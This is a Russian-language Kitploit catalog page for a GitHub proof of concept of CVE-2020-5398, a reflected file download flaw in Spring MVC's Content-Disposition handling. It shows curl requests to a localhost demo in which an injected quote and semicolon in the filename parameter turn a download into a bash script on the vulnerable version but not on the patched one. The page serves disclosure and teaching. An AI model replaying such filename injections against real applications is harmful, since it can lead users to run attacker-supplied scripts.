Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-5398 — CVE-2020-5398 - атака RFD (Reflected File Download) для Spring MVC | Kitploit
Инструменты/GitHubGitHub/motikan2010/cve-2020-5398
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubmotikan2010/cve-2020-5398

CVE-2020-5398

CVE-2020-5398 - атака RFD (Reflected File Download) для Spring MVC

Репозиторий
84183 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-5398 - RFD-атака (Reflected File Download) для Spring MVC

В Spring Framework, версии 5.2.x до 5.2.3, версии 5.1.x до 5.1.13 и версии 5.0.x до 5.0.16, приложение уязвимо к атаке reflected file download (RFD), когда оно устанавливает в ответе заголовок “Content-Disposition”, где атрибут filename получен из ввода пользователя.

Использование

root@kitploit:~
./gradlew bootrun

Прослушивание на 127.0.0.1:8080.

root@kitploit:~
$ curl 'http://127.0.0.1:8080/?filename=sample&contents=Hello,%20World' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.txt"
Content-Type: application/octet-stream
Content-Length: 12
Date: Fri, 17 Jan 2020 05:41:08 GMT

Hello, World

Начинается загрузка файла sample.txt.

PoC

Небезопасная версия (Spring Web 5.2.2)

root@kitploit:~
curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:22:18 GMT

#!/bin/bash
id

Начинается загрузка файла sample.sh. (Shell-файл)

Безопасная версия (Spring Web 5.2.3)

root@kitploit:~
$ curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh\";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:24:47 GMT

#!/bin/bash
id

Начинается загрузка файла sample.sh";.txt. (Текстовый файл)

Ссылки

  • CVE-2020-5398: RFD-атака через заголовок “Content-Disposition”, получаемый из ввода запроса в приложениях Spring MVC или Spring WebFlux | Безопасность | Pivotal
  • NVD - CVE-2020-5398
  • Что такое RFD-атака?
    • eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
    • Reflected File Download - OWASP
  • Коммит с исправлением
    • Рефакторинг ContentDisposition · spring-projects/spring-framework@956ffe6
Скачать инструмент